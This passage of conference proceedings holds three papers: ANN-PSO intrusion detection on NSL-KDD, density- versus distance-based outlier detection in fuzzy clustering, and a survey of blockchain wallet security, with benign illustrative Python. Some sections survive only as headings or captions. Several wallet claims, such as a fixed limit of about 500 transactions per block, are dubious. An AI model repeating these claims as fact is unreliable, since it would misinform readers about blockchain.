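    r1, r2 = random.random(), random.random()
    v = [W * vi + C1 * r1 * (pi - xi) + C2 * r2 * (gi - xi)
         for vi, xi, pi, gi in zip(v, x, p_best, g_best)]
    x = [xi + vi for xi, vi in zip(x, v)]       # new X_i = X_i + V_i  (Eq. 1)
    if fitness(x) < fitness(p_best):            # new fitness better than p_best
        p_best = list(x)                        # ... so p_best is replaced
    return x, v, p_best

random.seed(0)
x, v, p_best = [3.0, -4.0], [0.0, 0.0], [3.0, -4.0]
g_best = [0.0, 0.0]                             # pretend swarm-level best
for _ in range(100):
    x, v, p_best = pso_step(x, v, p_best, g_best)
```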
Using the PSO Algorithm to Train ANN This study uses PSO as a method to
train [19] and optimise the network's weights and biases. This is done by creating
a swarm whose dimension equals the number of weights and biases, achieved by
using an n-dimensional array; the weights and biases are retrieved from the array
when they are fed back to the network. Each of these particles represents an
individual neural network. To compute the error between the predictions and ground-
truth values, the negative log-likelihood is used. Figure 1 describes the ANN-PSO
algorithm.
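A minimal sketch of this encoding, assuming a toy one-hidden-layer network (the layer sizes are made up, and this is not the authors' code): each particle is a flat vector of all weights and biases, decoded on each fitness evaluation, with the negative log-likelihood as the fitness PSO minimises.

```python
import math, random

N_IN, N_HID, N_OUT = 4, 3, 2
DIM = N_IN * N_HID + N_HID + N_HID * N_OUT + N_OUT   # swarm dimension

def decode(particle):
    """Unpack a flat particle back into weight matrices and bias vectors."""
    i = 0
    w1 = [particle[i + k * N_IN:i + (k + 1) * N_IN] for k in range(N_HID)]
    i += N_IN * N_HID
    b1 = particle[i:i + N_HID]; i += N_HID
    w2 = [particle[i + k * N_HID:i + (k + 1) * N_HID] for k in range(N_OUT)]
    i += N_HID * N_OUT
    b2 = particle[i:i + N_OUT]
    return w1, b1, w2, b2

def forward(particle, x):
    """One forward pass: tanh hidden layer, softmax output."""
    w1, b1, w2, b2 = decode(particle)
    h = [math.tanh(sum(w * xi for w, xi in zip(row, x)) + b)
         for row, b in zip(w1, b1)]
    z = [sum(w * hi for w, hi in zip(row, h)) + b for row, b in zip(w2, b2)]
    m = max(z)
    exp_z = [math.exp(zi - m) for zi in z]
    s = sum(exp_z)
    return [e / s for e in exp_z]               # class probabilities

def nll(particle, xs, ys):
    """Negative log-likelihood: this particle's fitness."""
    return -sum(math.log(forward(particle, x)[y]) for x, y in zip(xs, ys))

random.seed(1)
particle = [random.uniform(-1, 1) for _ in range(DIM)]   # one random network
```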
The entire codebase of the algorithm was written in Python. Google Colab was
used with the following hardware specification. GPU: 1x Tesla K80, compute
capability 3.7, with 2496 CUDA cores; CPU: 1x single-core hyper-threaded Xeon
processor @ 2.3 GHz (1 core, 2 threads); RAM: 12.6 GB available.
4.1 Dataset
There are many datasets available for intrusion detection systems, some examples
being - DARPA98, KDDCup99, CAIDA, NSL-KDD, ISCX 2012, ADFA-LD and
ADFA-WD and CICIDS 2017 [20]. Among these datasets, the NSL-KDD dataset [17]
has been relied upon by many research works as consistent and duly representative of
real-time network traffic [14]. Hence, this is the dataset used in this research work.
It is derived from KDDCup [11] to eliminate the issues in the original KDDCup
dataset which led to faulty performance of anomaly detection methods. The main
A Hybrid Approach of ANN-PSO Technique … 761
criticism revolves around the non-familiarity of the traffic to real data networks,
no exact definition of attacks, and so on [13]. In these, the labelled attacks can be
classified into four subdivisions:
• Denial of Service attacks (DoS) take over a particular system and shut down traffic
to and from the system, causing an influx of traffic larger than the system's
capacity and leading to the system shutting down.
• Probe attacks, also known as surveillance attacks, steal sensitive information.
• User to Root attacks (U2R) attempt to exploit weaknesses in a system to gain
access to the network as a super-user with root access to that network.
• Remote to Local attacks (R2L) access the local network from a remote machine,
compromising the network without local access.
The labels of all the attacks mentioned in the KDD data-sets were successfully
categorised according to the four intrusion attack classes. Table 1 contains attacks
and percentages of each attack recorded.
762 S. Dahiya et al.
Table 1 Kinds of attacks and their subset category along with percentage in the datasets

Attacks | Labels                                             | KDDTrain+      | KDDTest+
DoS     | neptune, teardrop, nmap, smurf, pod, back, land,   | 47420 (37.64%) | 7533 (33.41%)
        | udpstorm, worm, apache2, mailbomb, processtable    |                |
Probe   | ipsweep, portsweep, saint, satan, mscan            | 10163 (8.07%)  | 2348 (10.41%)
U2R     | xterm, perl, rootkit, buffer_overflow, loadmodule, | 52 (0.04%)     | 67 (0.31%)
        | sqlattack, ps                                      |                |
R2L     | xlock, warezclient, guess_passwd, snmpguess,       | 995 (0.79%)    | 2885 (12.90%)
        | ftp_write, phf, warezmaster, multihop, imap, spy,  |                |
        | sendmail, httptunnel, named, snoop, snmpgetattack  |                |
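The label-to-class mapping of Table 1 can be folded into code as a simple lookup table; the dictionary below reproduces the labels listed above verbatim, and is one way (not necessarily the authors') to categorise each record:

```python
# Map each KDD attack label to its intrusion class, as listed in Table 1.
ATTACK_CLASS = {
    **dict.fromkeys(["neptune", "teardrop", "nmap", "smurf", "pod", "back",
                     "land", "udpstorm", "worm", "apache2", "mailbomb",
                     "processtable"], "DoS"),
    **dict.fromkeys(["ipsweep", "portsweep", "saint", "satan", "mscan"],
                    "Probe"),
    **dict.fromkeys(["xterm", "perl", "rootkit", "buffer_overflow",
                     "loadmodule", "sqlattack", "ps"], "U2R"),
    **dict.fromkeys(["xlock", "warezclient", "guess_passwd", "snmpguess",
                     "ftp_write", "phf", "warezmaster", "multihop", "imap",
                     "spy", "sendmail", "httptunnel", "named", "snoop",
                     "snmpgetattack"], "R2L"),
}

print(ATTACK_CLASS["smurf"])   # DoS
```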
Accuracy is used as the performance measure for our model, where accuracy is given
by the number of correct predictions divided by all of the predictions made:

Accuracy = (TP + TN) / (TP + FP + FN + TN)        (3)

The numerator counts the right predictions (true positives and true negatives),
whereas the denominator counts all the predictions made by the algorithm. To measure
the performance, the confusion matrix is used.
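A small helper for Eq. (3); the four arguments are the binary confusion-matrix counts, and the example numbers are made up:

```python
# Accuracy from confusion-matrix counts (Eq. (3)).
def accuracy(tp, tn, fp, fn):
    return (tp + tn) / (tp + fp + fn + tn)

print(accuracy(tp=950, tn=20, fp=20, fn=10))   # 0.97
```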
4.3 Analysis
The results obtained for each of these subsets are discussed below with comparison
with the various optimisation parameters, focusing on number of particles versus
accuracy and best cost, number of iterations versus accuracy and best cost, number
of hidden neurons versus accuracy and best cost.
In the graph shown in Fig. 2, the increase in particles to 500 causes the accuracy
to improve from 95 to 98%, with similar performance towards the end of the curve.
With respect to the change in best cost with an increase in particles in Fig. 3, the best
cost reduces as we increase the particles and reaches a constant value.
The graph in Fig. 4 shows that the accuracy for all the attack types consistently
increases from 95% and reaches its peak at 98% as we increase the iterations to 200.
All the subsets show similar behaviour as we increase the iterations and eventually
become constant. In Fig. 5, the best cost reduces as we increase the iterations.
Exhibiting similar behaviour, it reaches a point of constant value after a certain
number of iterations, and the performance of the model does not change thereafter.
The graph in Fig. 6 shows that the accuracy increases until 50 hidden neurons,
and thereafter reaches a constant value. Similarly, for the graph in Fig. 7, the cost
reduces until 50 hidden neurons and then saturates.
5 Conclusion
Through this paper, we presented the supervised learning model of artificial neural
networks coupled with particle swarm optimisation, which is used for training the
algorithm, to detect unknown anomaly attacks. The algorithm was tested using the
standard public data-set NSL-KDD. The experimental results, and a comparison with
similar studies conducted in the field of intrusion detection with supervised learning,
show that our model is more reliable, as the accuracy obtained for the various
subdivisions of the data-set, namely DoS, Probe, R2L, U2R and Mixed, ranges
from 97 to 99% with very slight deviation.
There are optimum parameters that can be set to get the best results using the ANN-
PSO algorithm, indicating that the fixed parameters used during the algorithm impact
the performance metrics. Using 50 particles or more gives the best accuracy, and the
optimal accuracy is obtained at 75 particles. The number of hidden neurons giving
maximum accuracy varies across the subdivisions, but using 75–150 hidden neurons
typically shows maximum accuracy. The marginal increase in accuracy on further
changing the parameters of the algorithm shows that the ANN-PSO model is consistent.
References
1. Shilpashree, S., et al. (2020). Evaluation of supervised machine learning algorithms for intru-
sion detection in wireless network using KDDCUP'99 and NSL-KDD datasets. International
Journal of Advanced Science and Technology, 29(3), 15037–15052.
2. Pu, G., Wang, L., Shen, J., & Dong, F. (2021). A hybrid unsupervised clustering-based anomaly
detection method. Tsinghua Science and Technology, 26(2), 146–153.
3. Chandre, P. R., Mahalle, P. N., & Shinde, G. R. (2018). Machine learning based novel approach
for intrusion detection and prevention system: A tool based verification. In IEEE Global Con-
ference on Wireless Computing and Networking (GCWCN) (pp. 135–140). India: Lonavala.
4. Fischer-Hübner, S. (n.d.). Intrusion Detection (IDS). Karlstad University Computer Science.
www.cs.kau.se/cs/education/courses/dvgc04/07p5/slides/Intrusion%20Detection%20(IDS).
pdf
5. Zhang, X., Niyaz, Q., Jahan, F., & Sun, W. (2020). Early detection of host-based intrusions
in linux environment. In IEEE International Conference on Electro Information Technology
(EIT) (pp. 475–479). Chicago: IL, USA.
6. Malek, Z. S., Trivedi, B., & Shah, A. (2020). User behavior pattern -signature based intrusion
detection. 2020 Fourth World Conference on Smart Trends in Systems, Security and Sustain-
ability (WorldS4) (pp. 549–552). London: United Kingdom.
7. Anand Sukumar, J. V., Pranav I., Neetish, M. & Narayanan, J. (2018). Network intrusion detec-
tion using improved genetic k-means algorithm. In: 2018 International Conference on Advances
in Computing, Communications and Informatics (ICACCI) (pp. 2441–2446). Bangalore.
8. Halimaa, A., & Sundarakantham, K. (2019). Machine learning based intrusion detection sys-
tem. In 3rd International Conference on Trends in Electronics and Informatics (ICOEI) (pp.
916–920). India: Tirunelveli.
9. Johari, R., Kalra, S., Dahiya, S., & Gupta, K. (2021). S2NOW: Secure social network ontology
using whatsApp. Security and Communication Networks, 2021, Article ID 7940103, 21 pages.
10. Dahiya, S., & Sharma, R. (2018). Comparative study of popular cryptographic techniques.
In 2018 Second World Conference on Smart Trends in Systems, Security and Sustainability
(WorldS4) (pp. 36–43). London.
11. KDD Cup 1999 Data, kdd.ics.uci.edu/databases/kddcup99/kddcup99.html
12. Kaliappan, J. (2015). Intrusion detection using artificial neural networks with best set of fea-
tures. International Arab Journal of Information Technology.
13. Tavallaee, M., Bagheri, E., Lu, W., & Ghorbani, A. A. (2009). A detailed analysis of the KDD
CUP 99 data set. IEEE Symposium on Computational Intelligence for Security and Defense
Applications (pp. 1–6). Ottawa, ON.
14. Hamid, Y., Ranganathan, B., Journaux, L., & Sugumaran, M. (2018). Benchmark datasets for
network intrusion detection: A review. International Journal of Network Security.
15. McHugh, J. (2000). Testing intrusion detection systems: a critique of the 1998 and 1999 darpa
intrusion detection system evaluations as performed by lincoln laboratory. ACM Transactions
on Information and System Security, 3(4), 262–294.
16. Taher, K. A., Jisan, B. M., & Rahman, M. M. (2019). Network intrusion detection using
supervised machine learning technique with feature selection. In 2019 International Conference
on Robotics,Electrical and Signal Processing Techniques (ICREST), pp. 643–646.
17. NSL-KDD-Datasets-Research-Canadian Institute for Cybersecurity-UNB. (n.d.). University
of New Brunswick www.unb.ca/cic/datasets/nsl.html
18. Latah, M., & Toker, L. (2018). Towards an efficient anomaly-based intrusion detection for
software-defined networks. IET Networks, 7(6), 453–459.
19. Nagappan, K., Kanmani, S., & Uthariaraj, V. (2013). Improving fault prediction using ANN-
PSO in object oriented systems. International Journal of Computer Applications.
20. Khraisat, A., Gondal, I., Vamplew, P., et al. (2019). Survey of intrusion detection systems:
techniques, datasets and challenges. Cybersecur, 2, 20.
Comparison of Density-Based
and Distance-Based Outlier Identification
Methods in Fuzzy Clustering
1 Introduction
A. Gosain
USICT, GGSIP University, Delhi, India
S. Dahiya (B)
Delhi Technological University, Delhi, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 769
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_62
770 A. Gosain and S. Dahiya
2 Outlier Identification Methods
A density-based outlier detection method considers the density of a data object and
its neighbors. A data object is spotted as an outlier if its density is comparatively
much lower than that of its neighbors [10].
Based on this concept of density-based outliers, a variant density-based outlier
method, DO, was proposed by P. Kaur and A. Gosain in 2010 [11, 12]. In DO, outlier
identification is done by introducing a new term, neighborhood membership, which
is defined as follows:
M_neighborhood^i (X) = η_neighborhood^i / η_max        (1)

where η_neighborhood^i is the number of data objects in the neighborhood of data
object 'x_i', and η_max = max_{i=1...n}(η_neighborhood^i). Any data object 'x_j' is
said to be in the neighborhood of 'x_i' only if it fulfills the following condition:

dist(p, i) ≤ r_neighborhood        (2)

where dist(p, i) is the Euclidean distance between 'i' and 'p', and r_neighborhood is
the neighborhood radius. Outliers are pinpointed using the following rule after tuning
a threshold value 'α' for M_neighborhood^i:

x_i is an outlier if M_neighborhood^i < α, and a non-outlier if
M_neighborhood^i ≥ α, ∀ i ∈ [1, ..., n]        (3)
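The three equations can be sketched together in code as follows. This is an illustrative reimplementation, not the authors' code, and the sample points, radius and threshold are made up:

```python
import math

# DO-style outlier test: count neighbours within r_neighborhood, normalise by
# the maximum count (Eq. (1)), and flag points whose neighbourhood membership
# falls below the threshold alpha (Eq. (3)).

def neighborhood_membership(data, r):
    counts = []
    for i, xi in enumerate(data):
        n = sum(1 for j, xj in enumerate(data)
                if i != j and math.dist(xi, xj) <= r)   # condition (2)
        counts.append(n)
    n_max = max(counts) or 1          # avoid division by zero if all isolated
    return [c / n_max for c in counts]

def do_outliers(data, r, alpha):
    """Return indices i with M_i < alpha (outliers)."""
    m = neighborhood_membership(data, r)
    return [i for i, mi in enumerate(m) if mi < alpha]

# Dense cluster plus one isolated point: the isolated point is flagged.
pts = [(0, 0), (0.5, 0), (0, 0.5), (0.5, 0.5), (10, 10)]
print(do_outliers(pts, r=1.0, alpha=0.25))   # [4]
```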
3 DO Versus DB
In this section, we have compared DO and DB. In Sect. 3.1, step-by-step working is
discussed on two standard datasets. In Sect. 3.2, performance analysis on a number
of standard datasets is discussed.
For this work, four standard datasets are used: D12, D15, D115, and Bensaid. A
brief description of each dataset is given in Table 1.
Fig. 2 Working of DO on D12 for various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25
From Figs. 2 and 3 and Table 2, it can be observed that DB is able to identify the
noise and outliers, whereas DO identifies only one outlier in the threshold range
0.0–0.35.
Figures 4 and 5 show the step-wise outlier identification process of DO and DB
for the D115 dataset at various threshold values (0.05, 0.10, 0.15, 0.20, 0.25). From
Figs. 4 and 5 and Table 2, it can be observed that DB shows high stability in outlier
identification: over the threshold range 0.0–0.35, its count of outliers is 8–10,
whereas over the same range DO's count of outliers goes from 9 to 37.
For a more detailed analysis of the performance of DO and DB, the results are
represented using histograms in Figs. 6, 7, and 8. In all these plots, the x-axis shows
the threshold value and the y-axis the number of outliers; red bars are DB results and
green bars are DO results. It is observed from these histograms that DB shows higher
stability and accuracy in identifying outliers; the distance-based method is also not
hypersensitive to the choice of threshold value and converges quickly on a threshold
value, unlike the density-based method.
774 A. Gosain and S. Dahiya
Fig. 3 DB on D12 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25
4 Conclusion
Fig. 4 DO on D115 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25, f 0.30
Fig. 5 DB on D115 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25
[Histogram: DO versus DB on the D15 dataset, showing the number of outliers at
threshold values from 0.00 to 1.00.]
Fig. 8 DO versus DB on Bensaid dataset
References
1. Hawkins, D. M. (1980). Identification of outliers (Vol. 11). London: Chapman and Hall.
2. Wu, X., Kumar, V., Ross Quinlan, J., Ghosh, J., Yang, Q., Motoda, H., McLachlan, G.J., et al.
(2008). Top 10 algorithms in data mining. Knowledge and Information Systems 14(1).
3. Ye, Xi., Zongxiang, Lu., Qiao, Y., Min, Y., & O’Malley, M. (2016). Identification and correction
of outliers in wind farm time series power data. IEEE Transactions on Power Systems, 31(6),
4197–4205.
4. Forero, P. A., Shafer, S., & Harguess, J. D. (2017). Sparsity-Driven Laplacian-regularized
outlier identification for dictionary learning. IEEE Transactions on Signal Processing, 65(14),
3803–3817.
5. Bezdek, J. C., Ehrlich, R., & Full, W. (1984). FCM: The fuzzy c-means clustering algorithm.
Computers & Geosciences, 10(2–3), 191–203.
6. Gosain, A., & Dahiya, S. (2016). Performance analysis of various fuzzy clustering algorithms:
A review. Procedia Computer Science, 79, 100–111.
7. Dahiya, S., Gosain, A., & Mann, S. (2020). Experimental analysis of fuzzy clustering
algorithms. In Intelligent data engineering and analytics (pp. 311–320). Singapore: Springer.
8. Dahiya, S., Gosain, A., & Gupta, S. (2020). RKT2FCM: RBF Kernel-Based Type-2 Fuzzy
Clustering. Available at SSRN 3577549.
9. Dahiya, S., Nanda, H., Artwani, J., & Varshney, J. (2020). Using clustering techniques and
classification mechanisms for fault diagnosis. International Journal, 9(2).
10. Han, J., Kamber, M., & Pei, J. (2006). Data mining, southeast asia edition: Concepts and
techniques. Morgan Kaufmann
11. Kaur, P., & Gosain, A. (2010). Density-oriented approach to identify outliers and get noiseless
clusters in Fuzzy C—Means. In 2010 IEEE International Conference on Fuzzy Systems (FUZZ)
(pp. 1–8). IEEE.
12. Kaur, P., & Gosain, A. (2011). A density oriented fuzzy C-means clustering algorithm for recog-
nising original cluster shapes from noisy data. International Journal of Innovative Computing
and Applications, 3(2), 77–87.
778 A. Gosain and S. Dahiya
13. Gosain, A., & Dahiya, S. (2020). A new robust fuzzy clustering approach: DBKIFCM. Neural
Processing Letters, 52(3), 2189–2210.
14. Ester, M., Kriegel, H.-P., Sander, J., & Xiaowei, Xu. (1996). A density-based algorithm for
discovering clusters in large spatial databases with noise. Kdd, 96(34), 226–231.
Analysis of Security Issues in Blockchain
Wallet
1 Introduction
Blockchain has been gaining traction every day since it was introduced by Satoshi
Nakamoto in 2008 as a technology to support cryptocurrency [1]. It was initially
invented for Bitcoin, but in later years it has found implications and applications in
the areas of finance, governance, energy grids, Internet of Things (IoT), healthcare,
businesses and industries, supply chain management, and education, through to
security and privacy, and many more [2–
Taruna
DPG Degree College, Gurugram, Haryana 122001, India
Rishabh (B)
ABES Engineering College, Ghaziabad, Uttar Pradesh 201009, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 779
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_63
780 Taruna and Rishabh
5]. Although various blockchain-based cryptocurrencies such as Ethereum, Cardano,
Nano, Vertcoin, etc. have been issued by digital financing companies in the recent past,
Bitcoin still has the largest market capital [6]. This immutable technology is
considered immune to third-party interference, but owing to its widespread popularity,
it is a hot target for cyber hackers [7]. These cyber risks are considered a prime
concern in financial transactions involving critical information. With the evolution
of the internet, security has become an even greater concern. Satoshi introduced
blockchain, which is considered, by far, the most secure technology for the exchange
of information and funds on an online platform [8].
Blockchain technology gets its popularity because of its decentralized and peer-to-
peer transaction capability [9]. Trust is a major issue with any centralized system,
which involves a third party for communication; since blockchain has the capability
of peer-to-peer transaction, it removes the need for the presence of any third party
in a transaction [10]. In other words, sender and receiver, the two peers
in any transaction, can communicate directly. Decentralization of blocks builds a
trustworthy system because everyone can use it anywhere, anytime, with an internet
connection.
Blockchain is a list of records called blocks. A number of blocks, created from
multiple series of transactions, are connected to form a chain called a ledger. This
ledger is distributed across all nodes in the network, and every node in the network
is given a copy of the ledger to save, making it a public distributed ledger as shown
in Fig. 1. Due to this decentralization, the risk of data tampering is reduced and data
are more cryptographically secure than in any centralized system [11]. Blockchain
is basically of three types: public, private and hybrid. But [12] categorizes blockchain
in a novel way, depending on its applications, as cryptocurrency blockchain (C2C),
business-to-cryptocurrency blockchain (B2C) and business-to-business blockchain
(B2B).
A blockchain structure has two major components: the header, and the transaction
details. The block header contains all the details required to carry out a transaction
in the blockchain [13]. It has a wallet address, which is basically the address of a
node in the form of numbers and letters, and which is public. In any transaction
Fig. 2 Attributes of a blockchain block
detail, only the numbers of a wallet are visible; no record of the person(s) can be
found. On the contrary, a private key is a string of random numbers which is known
only to the person to whom it belongs. When a transaction is performed by a node
in the network, it signs the transaction using its private key [14, 15] (Fig. 2).
Each block, along with the wallet, has the hash value of its own block and of the
previous block. The hash value of a block is a unique identifier, generated using a
hash function. To impart more security to a block, a trusted hash function can be
computed over the transaction record and the previous block's hash value, as shown
in Fig. 3. Such a hash function is more secure because if someone tries to change the
hash of a block, they need to change the hashes of all subsequent blocks, which is
almost impossible to achieve. To further enhance security and make the blocks more
secure and reliable, a nonce is added to each block. Each transaction basically has
the details of the transaction along with the wallet addresses of both sender and
receiver and the digital signature of the sender. These details are encrypted using
different encryption methods depending on the implementation.
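The chaining idea can be illustrated with a short sketch; the field layout and transaction strings below are made up and far simpler than any real block format:

```python
import hashlib, json

# Each block's hash covers its transactions, the previous block's hash, and a
# nonce, so altering any block invalidates every hash that follows it.

def block_hash(transactions, prev_hash, nonce):
    payload = json.dumps(
        {"tx": transactions, "prev": prev_hash, "nonce": nonce},
        sort_keys=True,                 # deterministic serialization
    ).encode()
    return hashlib.sha256(payload).hexdigest()

genesis = block_hash(["alice->bob:5"], "0" * 64, nonce=0)
second = block_hash(["bob->carol:2"], genesis, nonce=1)

# Tampering with the first block changes its hash, breaking the link to the
# second block, whose stored "prev" no longer matches.
tampered = block_hash(["alice->bob:500"], "0" * 64, nonce=0)
print(tampered != genesis)   # True: the chain no longer verifies
```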
A block can store the details of multiple transactions, up to a ceiling of about 500
transactions per block. Once a block reaches that limit, a new block is created.
Satoshi proposed an upper limit of 1 megabyte (MB) on the size of a block [1]; it
can grow up to 8 MB and sometimes more [4]. The size of a block limits the number
of transactions verified with each block by a miner: the bigger the block size, the
more transactions are verified.
A blockchain wallet is a digital locker, basically a program that permits users to
manage their cryptocurrency. It holds the public and private keys of a user to
encrypt transaction details. A transaction is successful only if there is a match of the
public and private keys of a blockchain.
Wallets can be categorized into multiple varieties, but the majorly used categories
include the following three types, depending on where a wallet is stored
[16].
Software Wallet: As the name implies, these wallets are stored on the system, either
a computer or mobile device, or online using a Web browser. They come with the
advantage of easy use, but security, hacking and the need for regular backups are
some pitfalls of these wallets.
Hardware Wallet: These wallets are popular due to their high security and safety
compared to software wallets. Hardware wallets can store the private keys of the
blockchain system for users on a hardware device such as a Universal Serial Bus
(USB) device, but they are costly to buy and use.
Paper Wallet: These are cold-storage wallets where the blockchain public and private
keys are generated by an application and then printed as a Quick Response
(QR) code used to process a transaction. They are the safest, as the holder only has to be
concerned with keeping the paper safe, but the time taken by such wallets is high
because QR-code scanning is involved in every transaction.
All cryptocurrencies used so far are based on a cryptographic public–private key
system. Public keys are known to everyone and are included in every transaction detail
to show the target of the transferred funds. The private key, on the other hand, is used for
authentication and for signing a transaction, and it is known only to the person it belongs
to. Every transaction is associated with an address, and generating this address
needs the private key of the sender. The blockchain wallet emerges in this scenario:
it automatically generates and stores a private key for each transaction without
disclosing it to anyone [17].
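The key-and-address relationship can be illustrated as follows. The `derive_public_key` step here is a one-way hash standing in for real elliptic-curve key derivation, so this sketch shows only the one-wayness of the scheme, not actual wallet cryptography:

```python
import hashlib
import secrets

def new_private_key() -> bytes:
    """A wallet draws the private key from a secure random source."""
    return secrets.token_bytes(32)

def derive_public_key(priv: bytes) -> bytes:
    # Stand-in for elliptic-curve point multiplication: a one-way hash,
    # so the public key cannot be reversed into the private key.
    return hashlib.sha256(b"pub:" + priv).digest()

def derive_address(pub: bytes) -> str:
    # Real chains hash the public key (e.g. SHA-256 + RIPEMD-160 in Bitcoin);
    # here a truncated SHA-256 hex digest illustrates the idea.
    return hashlib.sha256(pub).hexdigest()[:40]

priv = new_private_key()
addr = derive_address(derive_public_key(priv))
# The address is shared publicly; the private key never leaves the wallet.
```

Deriving the address requires the key material, but nothing in the address reveals the private key.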
The main issue with blockchain private keys is that a key is a random alphanumeric
string which is very hard for a human being to remember. Traditionally, the storage
mechanisms for private keys are memorization of the key, cold wallets, keeping the key
structure simple enough to be memorized, using a wallet provider to keep the key, and
storing keys in encrypted wallets [18]. All these methods have one or more problems,
such as the complexity of the private key, cold-wallet insecurity, and the inefficiency
of encrypted digital keys.
Analysis of Security Issues in Blockchain Wallet 783
2 Literature Review
Almost all available wallets back up private keys as mnemonics, which are hard for the
user to remember. To remember them, a person has to write the private-key mnemonic
on paper, which is an inconvenient and insecure method. Rezaeighaleh and Zou have
presented a backup scheme for hardware wallets with which one can transfer a private
key from one wallet to another using an untrusted terminal [21]. This strategy creates
two wallets with the same keys and gives the user the opportunity to use one as the main
wallet and the other as a backup wallet.
Blockchain itself is facing a lot of security issues [22], but blockchain wallets are
the easiest and main prey for attackers. People always rely on and trust blockchain
security, seeing its benefits and overlooking its weaknesses. Cybercriminals can
use traditional hacking methods for attacking wallets, or they can go further to find
and explore new ways to get access to the private key [23]. This section mainly focuses
on such user-facing vulnerabilities of wallets in blockchain, as enunciated below:
During the consensus phase, it is very important to check the integrity and authenticity
of data as well as to restrict false stations from entering the secure wallet. There are
many chances of attacks like phishing, hot-wallet attacks, etc., in the consensus phase.
Researchers have proposed various algorithms in which they suggest layering systems,
implemented in different ways, to protect the wallet. Om Pal et al. have analysed the existing
PKI and the necessity of key management for blockchain wallets [11]. For secure
group communication during the consensus phase, they proposed a group key management
(GKM) scheme. A multi-layer system architecture was proposed and
tested. It is assumed that upper-layer nodes are given more rights and privileges,
while nodes at the same level have the same privileges.
Gan et al. have also presented a double-layered structure for blockchain in which
Centralized Certificate Authorities (CCA) have the power to store public keys and add IoT
nodes for the inner layer, and inner nodes in turn can store public keys and add nodes for
the outer layer [11, 29, 30]. Matsumoto and Reischuk have shown that any misconduct
by Certificate Authorities (CA) can be regulated by consensus of the nodes, in a scheme known as
Instant Karma PKI [31]. The Guardtime approach suggested the use of a Physical Unclonable
Function (PUF) for identification of IoT devices, using physical properties of
the device to produce the required output [32]. A distinctive public–private key pair is generated
from this output, and these keys are then used in blockchain transactions. Although
many layers are suggested, an attacker can still invade through them; moreover,
these models require a lot of computation and are hard to implement.
He et al. have presented a more secure, semi-trusted, portable, social-network-based
wallet-management technique with advanced features of security, portability,
authentication and recovery [33]. They review the related wallet-management tools
presented in [34–37] to come up with a system design having more secure storage,
portable remote login on multiple devices, authentication without passwords, blind
wallet recovery, etc. The system model has four entities: User (U), Management
device (M), Proxy (P) and Central Server (C). M acts as a representative of U and
memorizes its sensitive data. P can be any smart device through which the user can
remotely log in and perform a transaction. Performance analysis of the proposed
system shows enhanced security and a fully functional wallet with little overhead and
time delay (in milliseconds).
Ning Wang and others have proposed an algorithm to improve security [38]. Their
method secures the blockchain private key by storing it using an image-steganography
technique. In their scheme, the private key is first padded with a random number,
then converted to a binary matrix, and finally an error-correction code is included
to minimize errors during transmission. The system is shown to have high
robustness and transparency, and hence high security. Various other researchers have
proposed techniques that combine steganography with cryptography to implement
key management in blockchain wallets [39–42].
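A minimal sketch of the least-significant-bit embedding idea behind such image-steganography schemes follows; the padding and error-correction steps of [38] are omitted, and the flat byte array stands in for real pixel data:

```python
def embed_key(pixels: bytearray, key: bytes) -> bytearray:
    """Hide each bit of `key` in the least-significant bit of one pixel byte."""
    bits = [(byte >> i) & 1 for byte in key for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover image too small")
    out = bytearray(pixels)
    for pos, bit in enumerate(bits):
        out[pos] = (out[pos] & 0xFE) | bit  # overwrite only the lowest bit
    return out

def extract_key(pixels: bytearray, key_len: int) -> bytes:
    """Read the low bits back and reassemble the hidden key bytes."""
    bits = [pixels[pos] & 1 for pos in range(key_len * 8)]
    return bytes(
        sum(bits[b * 8 + i] << i for i in range(8)) for b in range(key_len)
    )

# Round trip: a 32-byte "private key" hidden in a flat grey cover image.
cover = bytearray([128] * 1024)
key = bytes(range(32))
stego = embed_key(cover, key)
```

Since each pixel byte changes by at most 1, the stego image is visually indistinguishable from the cover, which is the transparency property the scheme relies on.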
Hosam presented a fractal steganographic technique to secure the blockchain wallet,
as it holds the keys used for buying and selling coins, most importantly the
user's private key [43]. Boiangiu et al. have used fractal trees to hide the private key.
A fractal is a complex image generated through iterations of a single formula, using
different values in each iteration along with the result of the previous iteration [44].
Research by Ma and Sun takes advantage of blockchain for decentralization
and stronger security in IoT, where the problem with existing key-management
schemes is their dependence on centralized authentication [45]. Tian et al., on the
other hand, used these features of blockchain in the dynamic wireless sensor networks
(DWSNs) used in industrial IoT [46]. A comparison of the various research works
is given in Table 1.
Zhu et al. introduced an architectural framework for a high-availability (HA) eWallet,
which is an online wallet [47]. They adopted an active architectural scheme.
The work of Engelmann et al. has two service units, viz. a transaction gateway, and
two storage units [48]. Fangdong Zhu proposes three models, the first a normal dual-master
model based on the multi-signature technology put forward by [49], in which a
3-of-5 scheme is used, i.e. five keys are generated randomly and the transaction is signed
using three of them. The other two keys are chosen and encrypted randomly and then
sent to the transaction gateway separately. These keys are stored in the storage units, and all
the data should be backed up periodically to a 'disaster recovery center'. The other two
models, the Simplex and the Recovery model, are used in case of failure of one or both
storage units, respectively. The authors guarantee smooth and secure functioning of the
architecture up to the loss of 50% of users' private keys in total [50].
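The 3-of-5 signing idea can be sketched as follows. HMAC stands in for the asymmetric multi-signature scheme, so this illustrates only the threshold logic, not the actual cryptography of [49]:

```python
import hashlib
import hmac
import secrets

def make_keys(n: int = 5) -> list:
    """Generate the n random keys of the threshold scheme."""
    return [secrets.token_bytes(32) for _ in range(n)]

def sign(key: bytes, tx: bytes) -> bytes:
    # HMAC stands in for an asymmetric signature in this sketch.
    return hmac.new(key, tx, hashlib.sha256).digest()

def threshold_ok(keys, tx, signatures, m: int = 3) -> bool:
    """A transaction is valid if at least m of the n keys produced a signature."""
    valid = sum(
        any(hmac.compare_digest(sign(k, tx), s) for s in signatures) for k in keys
    )
    return valid >= m

keys = make_keys()
tx = b"transfer 1 BTC"
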